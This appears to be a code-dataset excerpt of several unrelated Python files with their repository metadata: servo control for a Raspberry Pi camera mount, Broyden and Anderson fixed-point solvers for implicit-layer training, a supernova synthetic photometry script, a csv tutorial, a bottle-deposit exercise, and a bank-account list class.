    GPIO.setup(servoPIN_1, GPIO.OUT)
    GPIO.setup(servoPIN_2, GPIO.OUT)
    p_1 = GPIO.PWM(servoPIN_1, 50)  # GPIO 18 for PWM with 50Hz
    p_1.start(6)  # Initialisation at the centre duty cycle
    p_2 = GPIO.PWM(servoPIN_2, 50)
    p_2.start(5)
    p_1.ChangeDutyCycle(0)
    p_2.ChangeDutyCycle(0)
    p_1.ChangeDutyCycle(6)  # centre duty cycles for both axes
    p_2.ChangeDutyCycle(5)
    time.sleep(0.5)         # give the servos time to travel
    p_1.ChangeDutyCycle(0)  # zero duty -> stop actively driving
    p_2.ChangeDutyCycle(0)
def servo_right_turn():
    """Pan the camera servo right, then stop driving both servos.

    Holds a 2% duty cycle on the pan servo (BCM 18) for 0.5 s, then zeroes
    both duty cycles. Fix: removed the dead ``if True:`` wrapper around
    the movement block (always-true conditional).
    """
    servoPIN_1 = 18  # pan servo pin (BCM numbering)
    servoPIN_2 = 4   # tilt servo pin -- driven by the up/down functions
    GPIO.setmode(GPIO.BCM)
    GPIO.setup(servoPIN_1, GPIO.OUT)
    GPIO.setup(servoPIN_2, GPIO.OUT)
    p_1 = GPIO.PWM(servoPIN_1, 50)  # GPIO 18 for PWM with 50Hz
    p_1.start(6)  # Initialisation at the centre duty cycle
    p_2 = GPIO.PWM(servoPIN_2, 50)
    p_2.start(5)
    p_1.ChangeDutyCycle(0)
    p_2.ChangeDutyCycle(0)
    p_1.ChangeDutyCycle(2)  # 2% duty cycle == 'right' position
    time.sleep(0.5)         # give the servo time to travel
    p_1.ChangeDutyCycle(0)  # zero duty -> stop actively driving
    p_2.ChangeDutyCycle(0)
def servo_left_turn():
    """Pan the camera servo left, then stop driving both servos.

    Holds a 10% duty cycle on the pan servo (BCM 18) for 0.5 s, then
    zeroes both duty cycles. Fix: removed the dead ``if True:`` wrapper
    around the movement block (always-true conditional).
    """
    servoPIN_1 = 18  # pan servo pin (BCM numbering)
    servoPIN_2 = 4   # tilt servo pin -- driven by the up/down functions
    GPIO.setmode(GPIO.BCM)
    GPIO.setup(servoPIN_1, GPIO.OUT)
    GPIO.setup(servoPIN_2, GPIO.OUT)
    p_1 = GPIO.PWM(servoPIN_1, 50)  # GPIO 18 for PWM with 50Hz
    p_1.start(6)  # Initialisation at the centre duty cycle
    p_2 = GPIO.PWM(servoPIN_2, 50)
    p_2.start(5)
    p_1.ChangeDutyCycle(0)
    p_2.ChangeDutyCycle(0)
    p_1.ChangeDutyCycle(10)  # 10% duty cycle == 'left' position
    time.sleep(0.5)          # give the servo time to travel
    p_1.ChangeDutyCycle(0)   # zero duty -> stop actively driving
    p_2.ChangeDutyCycle(0)
| [
"noreply@github.com"
] | neiltarar.noreply@github.com |
285edea7dbbb66cd9e8bcc73dcb3e942f5c9406d | b7526d2cd24326f5b1133971e984b38d05855969 | /modules/solvers.py | 56b42105ea5953ffcc8ec89d28cf3c979efd8811 | [] | no_license | WCZ93762/ImpSq | 0515918f9eec816f3e1b481f7723a2e6ee254369 | bd490e95596608b351c73a6513db557ce94a09f0 | refs/heads/main | 2023-09-02T18:15:15.473544 | 2021-11-24T19:53:37 | 2021-11-24T19:53:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,679 | py | import torch
import torch
from torch import nn
import torch.nn.functional as functional
from torch.autograd import Function
from torch import autograd
import numpy as np
import pickle
import sys
import os
from scipy.optimize import root
import time
def _safe_norm(v):
if not torch.isfinite(v).all():
return np.inf
return torch.norm(v)
def scalar_search_armijo(phi, phi0, derphi0, c1=1e-4, alpha0=1, amin=0):
    """Scalar backtracking line search enforcing the Armijo condition.

    Adapted from scipy.optimize: find a step `alpha` with
    phi(alpha) <= phi0 + c1 * alpha * derphi0, first trying `alpha0`,
    then the minimizer of a quadratic model, then cubic interpolation.

    Args:
        phi: scalar objective along the search direction.
        phi0: phi(0).
        derphi0: directional derivative at 0 (expected negative).
        c1: Armijo sufficient-decrease constant.
        alpha0: first trial step.
        amin: smallest admissible step before giving up.

    Returns:
        (alpha, phi(alpha), extra phi evaluations); alpha is None on failure.
    """
    ite = 0
    phi_a0 = phi(alpha0)  # First do an update with step size 1
    if phi_a0 <= phi0 + c1*alpha0*derphi0:
        return alpha0, phi_a0, ite

    # Otherwise, compute the minimizer of a quadratic interpolant
    alpha1 = -(derphi0) * alpha0**2 / 2.0 / (phi_a0 - phi0 - derphi0 * alpha0)
    phi_a1 = phi(alpha1)

    # Otherwise loop with cubic interpolation until we find an alpha which
    # satisfies the first Wolfe condition (since we are backtracking, we will
    # assume that the value of alpha is not too small and satisfies the second
    # condition.
    while alpha1 > amin:  # we are assuming alpha>0 is a descent direction
        # Cubic model through (0, phi0) with slope derphi0 and the last two
        # trial points (alpha0, phi_a0), (alpha1, phi_a1).
        factor = alpha0**2 * alpha1**2 * (alpha1-alpha0)
        a = alpha0**2 * (phi_a1 - phi0 - derphi0*alpha1) - \
            alpha1**2 * (phi_a0 - phi0 - derphi0*alpha0)
        a = a / factor
        b = -alpha0**3 * (phi_a1 - phi0 - derphi0*alpha1) + \
            alpha1**3 * (phi_a0 - phi0 - derphi0*alpha0)
        b = b / factor

        # Minimizer of the cubic (torch ops: a/b may be tensors).
        alpha2 = (-b + torch.sqrt(torch.abs(b**2 - 3 * a * derphi0))) / (3.0*a)
        phi_a2 = phi(alpha2)
        ite += 1

        if (phi_a2 <= phi0 + c1*alpha2*derphi0):
            return alpha2, phi_a2, ite

        # Guard against steps shrinking too fast or too slowly.
        if (alpha1 - alpha2) > alpha1 / 2.0 or (1 - alpha2/alpha1) < 0.96:
            alpha2 = alpha1 / 2.0

        alpha0 = alpha1
        alpha1 = alpha2
        phi_a0 = phi_a1
        phi_a1 = phi_a2

    # Failed to find a suitable step length
    return None, phi_a1, ite
def line_search(update, x0, g0, g, nstep=0, on=True):
    """Line search along `update` for the root-finding objective ||g(x)||^2.

    `update` is the proposed direction of update. Code adapted from scipy.

    Args:
        update: search direction.
        x0: current iterate.
        g0: g(x0), passed in to avoid a re-evaluation.
        g: residual function whose squared norm is minimized.
        nstep: current outer-iteration count (not used in the computation).
        on: if False, skip the search and take a full step (s = 1).

    Returns:
        (x_new, g(x_new), x_new - x0, g(x_new) - g0, line-search evals)
    """
    tmp_s = [0]
    tmp_g0 = [g0]
    tmp_phi = [torch.norm(g0)**2]
    # NOTE(review): s_norm is computed but never used.
    s_norm = torch.norm(x0) / torch.norm(update)

    def phi(s, store=True):
        # Squared residual norm at x0 + s*update, with a one-slot cache so the
        # accepted step does not pay a second g() evaluation below.
        if s == tmp_s[0]:
            return tmp_phi[0]  # If the step size is so small... just return something
        x_est = x0 + s * update
        g0_new = g(x_est)
        phi_new = _safe_norm(g0_new)**2
        if store:
            tmp_s[0] = s
            tmp_g0[0] = g0_new
            tmp_phi[0] = phi_new
        return phi_new

    if on:
        s, phi1, ite = scalar_search_armijo(phi, tmp_phi[0], -tmp_phi[0], amin=1e-2)
    if (not on) or s is None:
        # Search disabled or failed: fall back to a unit step.
        s = 1.0
        ite = 0

    x_est = x0 + s * update
    if s == tmp_s[0]:
        g0_new = tmp_g0[0]  # reuse the cached evaluation for the accepted step
    else:
        g0_new = g(x_est)
    return x_est, g0_new, x_est - x0, g0_new - g0, ite
def rmatvec(part_Us, part_VTs, x):
    """Left-multiply by the approximate inverse Jacobian: x^T (-I + U V^T).

    Shapes: x (N, L'), part_Us (N, L', threshold), part_VTs (N, threshold, L').
    Returns a (N, L') tensor.
    """
    # Empty history: the approximation is just -I.
    if part_Us.nelement() == 0:
        return -x
    # Batched vector-matrix products via bmm instead of einsum.
    xTU = torch.bmm(x.unsqueeze(1), part_Us).squeeze(1)          # (N, threshold)
    return torch.bmm(xTU.unsqueeze(1), part_VTs).squeeze(1) - x  # (N, L')
def matvec(part_Us, part_VTs, x):
    """Right-multiply by the approximate inverse Jacobian: (-I + U V^T) x.

    Shapes: x (N, L'), part_Us (N, L', threshold), part_VTs (N, threshold, L').
    Returns a (N, L') tensor.
    """
    # Empty history: the approximation is just -I.
    if part_Us.nelement() == 0:
        return -x
    # Batched matrix-vector products via bmm instead of einsum.
    VTx = torch.bmm(part_VTs, x.unsqueeze(2)).squeeze(2)        # (N, threshold)
    return torch.bmm(part_Us, VTx.unsqueeze(2)).squeeze(2) - x  # (N, L')
########################################################################
# Solvers
########################################################################
def forward_iteration(f, x0, max_iter=100, tol=1e-2, stop_mode='rel'):
    """Plain fixed-point iteration x <- f(x) with residual bookkeeping.

    `f` must accept a `use_cached` keyword (True after the first step).
    Stops once the 'abs' residual ||f(x)-x|| or the 'rel' residual
    ||f(x)-x|| / ||f(x)|| (chosen by `stop_mode`) drops below `tol`.

    Returns a dict with the iterate ('result'), the best residual seen
    ('lowest') and its step ('nstep'), plus fixed-length residual traces.
    NOTE(review): lowest_xest is overwritten with f0 on every iteration,
    so 'result' is always the *last* iterate, not the best-residual one --
    confirm this is intended before relying on it.
    """
    alternative_mode = 'rel' if stop_mode == 'abs' else 'abs'
    trace_dict = {'abs': [],
                  'rel': []}
    lowest_dict = {'abs': 1e8,
                   'rel': 1e8}
    lowest_step_dict = {'abs': 0,
                        'rel': 0}
    for k in range(1, max_iter + 1):
        # Feed the previous output back in as the next input.
        if k == 1:
            x = x0
        else:
            x = f0
        f0 = f(x, use_cached=k > 1)
        lowest_xest = f0
        abs_diff = torch.norm(f0 - x).item()
        rel_diff = abs_diff / (torch.norm(f0).item() + 1e-9)
        diff_dict = {'abs': abs_diff,
                     'rel': rel_diff}
        trace_dict['abs'].append(abs_diff)
        trace_dict['rel'].append(rel_diff)
        for mode in ['rel', 'abs']:
            if diff_dict[mode] < lowest_dict[mode]:
                lowest_dict[mode] = diff_dict[mode]
                lowest_step_dict[mode] = k
                if mode == stop_mode and lowest_dict[mode] < tol:
                    lowest_xest = f0
        if trace_dict[stop_mode][-1] < tol:
            # Converged: pad the traces to a fixed length before leaving.
            for _ in range(max_iter-1-k):
                trace_dict[stop_mode].append(lowest_dict[stop_mode])
                trace_dict[alternative_mode].append(lowest_dict[alternative_mode])
            break
    out = {"result": lowest_xest,
           "lowest": lowest_dict[stop_mode],
           "nstep": lowest_step_dict[stop_mode],
           "prot_break": False,
           "abs_trace": trace_dict['abs'],
           "rel_trace": trace_dict['rel'],
           "tol": tol,
           "max_iter": max_iter}
    return out
def broyden(f, x0, max_iter=100, tol=1e-2, stop_mode="rel", ls=False):
    """Root-find g(x) = f(x) - x with a limited-memory Broyden method.

    Maintains a low-rank approximation -I + U V^T of the inverse Jacobian
    (at most m = 5 stored rank-one updates, overwritten cyclically) and
    optionally runs an Armijo line search (`ls`) on each step. Stops when
    the 'abs' residual ||g(x)|| or the 'rel' residual (chosen by
    `stop_mode`) drops below `tol`, when progress stalls near tolerance,
    or on a protective divergence break.

    Returns a dict with the best iterate ('result'), its residual
    ('lowest'), the step it was found at ('nstep'), the divergence flag
    ('prot_break'), and fixed-length residual traces.
    """
    bsz, seq_len = x0.size()
    g = lambda y: f(y) - y
    dev = x0.device
    alternative_mode = 'rel' if stop_mode == 'abs' else 'abs'

    x_est = x0   # (bsz, L')
    gx = g(x_est)   # (bsz, L')
    nstep = 0
    tnstep = 0

    m = 5   # history size for the low-rank inverse-Jacobian updates
    # For fast calculation of inv_jacobian (approximately)
    Us = torch.zeros(bsz, seq_len, m).to(dev)   # One can also use an L-BFGS scheme to further reduce memory
    VTs = torch.zeros(bsz, m, seq_len).to(dev)
    update = -matvec(Us[:,:,:nstep], VTs[:,:nstep], gx)   # Formally should be -torch.matmul(inv_jacobian (-I), gx)
    prot_break = False

    # To be used in protective breaks
    protect_thres = 1e3 * seq_len
    new_objective = 1e8

    trace_dict = {'abs': [],
                  'rel': []}
    lowest_dict = {'abs': 1e8,
                   'rel': 1e8}
    lowest_step_dict = {'abs': 0,
                        'rel': 0}
    nstep, lowest_xest, lowest_gx = 0, x_est, gx

    for nstep in range(1, max_iter + 1):
        x_est, gx, delta_x, delta_gx, ite = line_search(update, x_est, gx, g, nstep=nstep, on=ls)
        tnstep += (ite+1)
        abs_diff = torch.norm(gx).item()
        rel_diff = abs_diff / (torch.norm(gx + x_est).item() + 1e-9)
        diff_dict = {'abs': abs_diff,
                     'rel': rel_diff}
        trace_dict['abs'].append(abs_diff)
        trace_dict['rel'].append(rel_diff)
        # Track the best iterate seen so far under each stopping criterion.
        for mode in ['rel', 'abs']:
            if diff_dict[mode] < lowest_dict[mode]:
                if mode == stop_mode:
                    lowest_xest, lowest_gx = x_est.clone().detach(), gx.clone().detach()
                lowest_dict[mode] = diff_dict[mode]
                lowest_step_dict[mode] = nstep

        new_objective = diff_dict[stop_mode]
        if new_objective < tol: break
        if new_objective < 3*tol and nstep > 30 and np.max(trace_dict[stop_mode][-30:]) / np.min(trace_dict[stop_mode][-30:]) < 1.3:
            # if there's hardly been any progress in the last 30 steps
            break
        if new_objective > trace_dict[stop_mode][0] * protect_thres:
            # Residual blew up relative to the start: protective bail-out.
            prot_break = True
            break

        # Rank-one update of the -I + U V^T inverse-Jacobian approximation;
        # NaN entries from a degenerate denominator are zeroed defensively.
        n = min(nstep - 1, m)
        part_Us, part_VTs = Us[:,:,:n], VTs[:,:n]
        vT = rmatvec(part_Us, part_VTs, delta_x)
        u = (delta_x - matvec(part_Us, part_VTs, delta_gx)) / torch.einsum('bi, bi -> b', vT, delta_gx)[:,None]
        vT[vT != vT] = 0
        u[u != u] = 0
        VTs[:,(nstep-1) % m] = vT
        Us[:,:,(nstep-1) % m] = u
        update = -matvec(Us[:,:,:n + 1], VTs[:,:n + 1], gx)

    # Fill everything up to the threshold length (even if )
    for _ in range(max_iter+1-len(trace_dict[stop_mode])):
        trace_dict[stop_mode].append(lowest_dict[stop_mode])
        trace_dict[alternative_mode].append(lowest_dict[alternative_mode])

    return {"result": lowest_xest,
            "lowest": lowest_dict[stop_mode],
            "nstep": lowest_step_dict[stop_mode],
            "prot_break": prot_break,
            "abs_trace": trace_dict['abs'],
            "rel_trace": trace_dict['rel'],
            "tol": tol,
            "max_iter": max_iter}
def anderson(f, x0, max_iter=100, tol=1e-2, m=5, lam=1e-4, stop_mode='rel', beta=1.0, **kwargs):
    """ Anderson acceleration for fixed point iteration.

    Solves z = f(z) starting from `x0` by keeping the last `m` iterates and
    residuals and combining them with least-squares weights (ridge-damped by
    `lam`); `beta` mixes the extrapolated f-values with the extrapolated
    iterates (1.0 = undamped). Stops when the 'abs' residual ||f(z)-z|| or
    the 'rel' residual ||f(z)-z|| / ||f(z)|| (chosen by `stop_mode`) drops
    below `tol`.

    Fixes: torch.solve (removed in PyTorch 1.13) replaced by
    torch.linalg.solve; lowest_xest initialised so the function no longer
    raises NameError when max_iter <= 2.

    Returns:
        dict with the best iterate ('result'), its residual ('lowest'), the
        step it was found at ('nstep'), and the residual traces.
    """
    bsz, L = x0.shape
    alternative_mode = 'rel' if stop_mode == 'abs' else 'abs'
    X = torch.zeros(bsz, m, L, dtype=x0.dtype, device=x0.device)
    F = torch.zeros(bsz, m, L, dtype=x0.dtype, device=x0.device)
    X[:,0], F[:,0] = x0.reshape(bsz, -1), f(x0).reshape(bsz, -1)
    X[:,1], F[:,1] = F[:,0], f(F[:,0].reshape_as(x0)).reshape(bsz, -1)

    # Bordered normal-equations system enforcing sum(alpha) = 1.
    H = torch.zeros(bsz, m+1, m+1, dtype=x0.dtype, device=x0.device)
    H[:,0,1:] = H[:,1:,0] = 1
    y = torch.zeros(bsz, m+1, 1, dtype=x0.dtype, device=x0.device)
    y[:,0] = 1

    trace_dict = {'abs': [],
                  'rel': []}
    lowest_dict = {'abs': 1e8,
                   'rel': 1e8}
    lowest_step_dict = {'abs': 0,
                        'rel': 0}
    lowest_xest = x0  # fallback so 'result' is never unbound when max_iter <= 2

    for k in range(2, max_iter):
        n = min(k, m)
        G = F[:,:n]-X[:,:n]
        H[:,1:n+1,1:n+1] = torch.bmm(G,G.transpose(1,2)) + lam*torch.eye(n, dtype=x0.dtype,device=x0.device)[None]
        # torch.solve(B, A) was deprecated in 1.8 and removed in 1.13;
        # torch.linalg.solve(A, B) solves A x = B with the same result.
        alpha = torch.linalg.solve(H[:,:n+1,:n+1], y[:,:n+1])[:, 1:n+1, 0]   # (bsz x n)

        X[:,k%m] = beta * (alpha[:,None] @ F[:,:n])[:,0] + (1-beta)*(alpha[:,None] @ X[:,:n])[:,0]
        F[:,k%m] = f(X[:,k%m].reshape_as(x0)).reshape(bsz, -1)
        gx = (F[:,k%m] - X[:,k%m]).view_as(x0)
        abs_diff = gx.norm().item()
        rel_diff = abs_diff / (1e-5 + F[:,k%m].norm().item())
        diff_dict = {'abs': abs_diff,
                     'rel': rel_diff}
        trace_dict['abs'].append(abs_diff)
        trace_dict['rel'].append(rel_diff)

        # Track the best iterate seen under each stopping criterion.
        for mode in ['rel', 'abs']:
            if diff_dict[mode] < lowest_dict[mode]:
                if mode == stop_mode:
                    lowest_xest = X[:,k%m].view_as(x0).clone().detach()
                lowest_dict[mode] = diff_dict[mode]
                lowest_step_dict[mode] = k

        if trace_dict[stop_mode][-1] < tol:
            # Converged: pad the traces to a fixed length before leaving.
            for _ in range(max_iter-1-k):
                trace_dict[stop_mode].append(lowest_dict[stop_mode])
                trace_dict[alternative_mode].append(lowest_dict[alternative_mode])
            break

    out = {"result": lowest_xest,
           "lowest": lowest_dict[stop_mode],
           "nstep": lowest_step_dict[stop_mode],
           "prot_break": False,
           "abs_trace": trace_dict['abs'],
           "rel_trace": trace_dict['rel'],
           "tol": tol,
           "max_iter": max_iter}
    X = F = None  # drop the history buffers promptly
    return out
class DEQBackward(torch.autograd.Function):
    """Base autograd Function for implicit (DEQ-style) differentiation.

    forward() passes the fixed-point value `f` straight through while
    saving (f, z) so subclasses can form vector-Jacobian products in
    backward(); each subclass supplies a different solver for the adjoint
    equation y = vjp(y) + grad.
    """
    @staticmethod
    def forward(ctx, f, z):
        ctx.save_for_backward(f, z)
        return f

    @staticmethod
    def backward(ctx, grad):
        # Subclasses must implement the adjoint solve.
        raise NotImplementedError
class OnestepBackward(DEQBackward):
    """Cheapest approximate backward: one step of the adjoint iteration."""
    @staticmethod
    def backward(ctx, grad):
        f, z = ctx.saved_tensors
        # One application of y <- vjp(y) + grad, starting from y = grad.
        return autograd.grad(f, z, grad, retain_graph=True)[0] + grad, None
class TwostepBackward(DEQBackward):
    """Two steps of the adjoint fixed-point iteration y <- vjp(y) + grad."""
    @staticmethod
    def backward(ctx, grad):
        f, z = ctx.saved_tensors
        y = grad
        for i in range(2):
            y = autograd.grad(f, z, y, retain_graph=True)[0] + grad
        return y, None
class ForwardIterBackward(DEQBackward):
    """Solve the adjoint equation by plain fixed-point iteration."""
    @staticmethod
    def backward(ctx, grad):
        f, z = ctx.saved_tensors
        tol = 1e-2
        # Iterate y <- vjp(y) + grad until the relative residual is < tol;
        # the dummy use_cached kwarg matches forward_iteration's interface.
        solver_stats = forward_iteration(lambda y, use_cached=False : autograd.grad(f, z, y, retain_graph=True)[0] + grad,
                                         grad,
                                         max_iter=100,
                                         tol=tol,
                                         stop_mode='rel')
        backward = solver_stats['result']
        backward_steps = solver_stats['nstep']
        # print("Backward: Iterations {:d}, Error {:e}".format(backward_steps, backward_res))
        return backward, None
class AndersonBackward(DEQBackward):
    """Solve the adjoint fixed-point equation with Anderson acceleration."""
    @staticmethod
    def backward(ctx, grad):
        f, z = ctx.saved_tensors
        tol = 1e-2
        # Solve y = vjp(y) + grad for the implicit gradient via anderson().
        solver_stats = anderson(lambda y : autograd.grad(f, z, y, retain_graph=True)[0] + grad,
                                grad,
                                max_iter=100,
                                tol=tol,
                                stop_mode='rel')
        backward = solver_stats['result']
        backward_res = solver_stats['lowest']
        backward_steps = solver_stats['nstep']
        # print("Backward: Iterations {:d}, Error {:e}".format(backward_steps, backward_res))
        return backward, None
class BroydenBackward(DEQBackward):
    """Solve the adjoint fixed-point equation with Broyden's method.

    Unlike the other backward variants, this one hard-fails (RuntimeError)
    when the solver does not reach the tolerance, after printing the
    residual traces for debugging.
    """
    @staticmethod
    def backward(ctx, grad):
        f, z = ctx.saved_tensors
        tol = 1e-2
        # Solve y = vjp(y) + grad for the implicit gradient via broyden().
        solver_stats = broyden(lambda y : autograd.grad(f, z, y, retain_graph=True)[0] + grad,
                               grad,
                               max_iter=100,
                               tol=tol,
                               stop_mode='rel')
        backward = solver_stats['result']
        backward_res = solver_stats['lowest']
        backward_steps = solver_stats['nstep']
        if backward_res > tol:
            # Diagnostics for a failed adjoint solve; the commented block can
            # dump the gradient/Jacobian to disk for offline inspection.
            print(solver_stats['abs_trace'])
            print(solver_stats['rel_trace'])
            eye_mat = torch.eye(z.shape[-1]).to(z.device)
            # input("Press enter to save grad and jacobian for debugging")
            # n_samples = 5000
            # indices = np.random.choice(f.shape[0], n_samples, replace=False)
            # grad_mat = torch.zeros(n_samples, z.shape[-1], f.shape[-1])
            # for j in range(z.shape[-1]):
            #     grad_mat[:, j] = autograd.grad(f, z, grad_outputs=eye_mat[j].unsqueeze(0).expand_as(z), retain_graph=True)[0][indices]
            # np.save('./cache/cached_jac.npy', grad_mat.cpu().numpy())
            # np.save('./cache/cached_grad.npy', grad[indices].cpu().numpy())
            raise RuntimeError()
        # print("Backward: Iterations {:d}, Error {:e}".format(backward_steps, backward_res))
        return backward, None
| [
"ericaragorncn@gmail.com"
] | ericaragorncn@gmail.com |
9a9b803419d5990b9026b87d2c0f13bb6ede8384 | 008cb73de02f0ecb445f37a3a7ffe5e5ab85930e | /old/IRphotometry.py | 485bdd8195b0f59e28da93b028e9382b54f36689 | [
"MIT"
] | permissive | pbrown801/aggienova-templates | e3589ada6aa1f2e37492f34a8c3cbe5d1f345e89 | e57bef9b1cec03a39ec83fff5ce9b0832a3073e1 | refs/heads/master | 2023-01-14T02:32:02.314243 | 2022-10-20T22:22:16 | 2022-10-20T22:22:16 | 166,312,098 | 6 | 2 | MIT | 2022-12-27T15:34:55 | 2019-01-17T23:30:10 | Python | UTF-8 | Python | false | false | 2,794 | py | import numpy as np
# Script: synthetic IR photometry of a redshifted supernova spectrum through
# JWST NIRCam filters, plotted against distance. Depends on local data files
# and the project-local w_f_in() pulled in by the star import below.
from spectrophot_array_in import *
from astropy.cosmology import FlatLambdaCDM
import pysynphot as S

# Flat Lambda-CDM cosmology used for all luminosity distances.
cosmo = FlatLambdaCDM(H0=73, Om0=0.3)

# NIRCam filter throughput curves: column 0 = wavelength, column 1 = throughput.
F200_wave, F200_tp = np.loadtxt('F200W_NRC_and_OTE_ModAB_mean.txt', dtype=float,
                                usecols=(0, 1), unpack=True, skiprows=1)
F200_filter = [F200_wave, F200_tp]  ### tp is throughput
F444_wave, F444_tp = np.loadtxt('F444W_NRC_and_OTE_ModAB_mean.txt', dtype=float,
                                usecols=(0, 1), unpack=True, skiprows=1)
F444_filter = [F444_wave, F444_tp]

F200_bp = S.ArrayBandpass(F200_filter[0], F200_filter[1], name='F200')  ###Wavelength in microns
F444_bp = S.ArrayBandpass(F444_filter[0], F444_filter[1], name='F444')  ###Wavelength in microns

# this was for testing the spectrophotometry code
# vega_wave,vega_flux = np.loadtxt('spectra/vega.dat',dtype=float,usecols=(0,1),unpack=True)

# Here is the input spectrum and the corresponding distance
input_wave, input_flux = np.loadtxt('spectra/Gaia16apd_uv.dat', dtype=float, usecols=(0, 1), unpack=True)
# distance in Megaparsecs, here calculated from redshift for Gaia16apd
distance_sn = cosmo.luminosity_distance(0.102)
#mag_array = [1,1,1,1,1,1];
#mag_array=w_f_in(input_wave,input_flux)

# set redshift array and initialize other arrays which will have the same length
# NOTE(review): 1.1 appears twice in this list; the loop below assumes exactly
# 22 entries, so removing the duplicate also requires changing range(0, 22, 1)
# -- confirm whether the repeat is intentional.
redshifts = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0,1.1,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8,1.9,2.0,2.1]
redshiftmags = []
distances = []
lightyears = []
for counter in range(0, 22, 1):
    z = redshifts[counter]
    # calculate distance in Megaparsecs
    lumidist = cosmo.luminosity_distance(z)
    distances.append(lumidist)
    # distances[counter]=lumidist
    # lightyears[counter]=lumidist*3.26*10.0**6.0
    lightyears.append(lumidist*3.26*10.0**6.0)  # Mpc -> light-years (1 Mpc = 3.26e6 ly)
    # print(lightyears[counter])
    # correct for the effects of distance and flux dilution
    redshiftedflux = np.multiply(distance_sn**2.0, input_flux)
    redshiftedflux = np.divide(redshiftedflux, lumidist**2.0)
    redshiftedflux = np.divide(redshiftedflux, 1.0+z)
    # print(z)
    # NOTE(review): redshiftedflux is computed but never used, and w_f_in is
    # called with the redshifted *filter curve*, not the spectrum -- verify
    # this is the intended input to the synthetic-photometry routine.
    mag_array = w_f_in(F200_filter[0]*(1.0+z), F200_filter[1])
    # print(mag_array[5])
    redshiftmags.append(mag_array[5])
    # print(redshifts[counter], redshiftmags[counter])
    # print(lightyears[counter],redshiftmags[counter])
    # print(z,redshifts[counter])
print(redshiftmags)
print(lightyears)

import matplotlib.pyplot as plt
#plt.plot(lightyears,redshiftmags)
##t = np.linspace(1,5,6)
#best fit line and plotting
# NOTE(review): the x-axis data is lightyears while the label says 'Redshift'
# -- confirm which quantity should be plotted.
plt.ylabel('Observed Peak Magnitude (V)')
plt.xlabel('Redshift')
plt.title('Magnitudes versus redshift')
plt.plot(lightyears, redshiftmags, 'b*')
plt.plot([4.5, 5.5], [28, 28], color='k', linestyle='--', linewidth=2)
## invert y axis makes the brighter magnitude higher
plt.gca().invert_yaxis()
plt.show()
| [
"peterbrown@byu.net"
] | peterbrown@byu.net |
87375f2c2f39dfe9a1ad71c371098b8f691bf395 | d1d4efba2ef0f8e37fb7d78dfcb007f0fc475093 | /semana_6/programas/00_csv.py | b5bfc3e4e517b5eea10fb340f826899a7b8ebe01 | [] | no_license | mariaelisa492/Fundamentos_python | 4597d3bb3600e245ac769e4b98d09249d56d2473 | 933ad80b502633c26fe2a430a11961272dfaee42 | refs/heads/main | 2023-06-17T00:53:34.867268 | 2021-07-07T20:51:15 | 2021-07-07T20:51:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 857 | py | # -*- coding: utf-8 -*-
"""
libreria csv
"""
# In[]
# persistencia en los datos
import csv
# In[]
# para leer
# open abre y prepara el archivo
archivo = open("arreglo.txt")
# lee lo que hay en el archivo
a = archivo.read()
print(a)
# In[]
# lo divide tomando como referente la ,
b = a.split(",")
print(b)
# In[]
# Para escribir
k = [["e1","e10","e3"],[25,15,65]]
with open('prueba.csv', newline='', mode='w') as file: #w: abre en modo escritura
writer = csv.writer(file)
for i in k:
writer.writerow([i])
# In[]
with open('employee_file.csv', mode='w') as employee_file:
employee_writer = csv.writer(employee_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
employee_writer.writerow(['John Smith', 'Accounting', 'November'])
employee_writer.writerow(['Erica Meyers', 'IT', 'March']) | [
"gomezmunera@corum.org.co"
] | gomezmunera@corum.org.co |
0c1e08fd4a1399434643badb0efceafbc90ea86d | c57d718f1b5f9ccb4e59d202823f1ce8a9515ace | /oo/contas.py | a4c3d399239df5a920ecbcf345c75ae82527c17b | [] | no_license | mvfrasca/Caelum-Python | c01c6b568174e2ed9c9c7e8f86eb0c34f94ea959 | a3da3c0ebc067685d92a791ea3813f69d2566edd | refs/heads/master | 2020-09-29T07:25:12.730291 | 2019-12-20T00:14:01 | 2019-12-20T00:14:01 | 226,986,308 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,312 | py | from collections import MutableSequence
from conta import Conta
class Contas(MutableSequence):
_dados = []
def __len__(self):
return len(self._dados)
def __getitem__(self, posicao):
return self._dados[posicao]
def __setitem__(self, posicao, valor):
if isinstance(valor, Conta):
self._dados[posicao] = valor
else:
raise TypeError("Valor atribuído não é uma conta")
def __delitem__(self, posicao):
del self._dados[posicao]
def insert(self, posicao, valor):
if isinstance(valor, Conta):
return self._dados.insert(posicao, valor)
else:
raise TypeError("Valor atribuído não é uma conta")
if __name__ == '__main__':
import csv
from conta import ContaCorrente
from data import Data
data = Data(16, 12, 2019)
contas = Contas()
arquivo = open('contas.txt', 'r')
leitor = csv.reader(arquivo)
for linha in leitor:
conta = ContaCorrente(linha[0], linha[1], float(linha[2]), float(linha[3]), data)
conta.atualiza(0.0123)
contas.append(conta)
arquivo.close()
print('Saldo\t\tImposto')
print('-----\t\t-------')
for c in contas:
print(f'{c.saldo}\t\t{c.get_valor_imposto()}')
| [
"mvfrasca@gmail.com"
] | mvfrasca@gmail.com |
815daa7a085d07da2383291fdfe140fe3de24d40 | 667f153e47aec4ea345ea87591bc4f5d305b10bf | /Solutions/Ch1Ex005.py | 0a2cd702fe7a62a4875fa2674961e86c12ac5580 | [] | no_license | Parshwa-P3/ThePythonWorkbook-Solutions | feb498783d05d0b4e5cbc6cd5961dd1e611f5f52 | 5694cb52e9e9eac2ab14b1a3dcb462cff8501393 | refs/heads/master | 2022-11-15T20:18:53.427665 | 2020-06-28T21:50:48 | 2020-06-28T21:50:48 | 275,670,813 | 1 | 0 | null | 2020-06-28T21:50:49 | 2020-06-28T21:26:01 | Python | UTF-8 | Python | false | false | 342 | py | # Ch1Ex005.py
# Author: Parshwa Patil
# ThePythonWorkbook Solutions
# Exercise No. 5
# Title: Bottle Deposits
def main():
lessThan1 = int(input("Less than 1 L: "))
moreThan1 = int(input("More than 1 L: "))
refund = (0.1 * lessThan1) + (0.25 * moreThan1)
print("Refund: $" + str(refund))
if __name__ == "__main__": main() | [
"noreply@github.com"
] | Parshwa-P3.noreply@github.com |
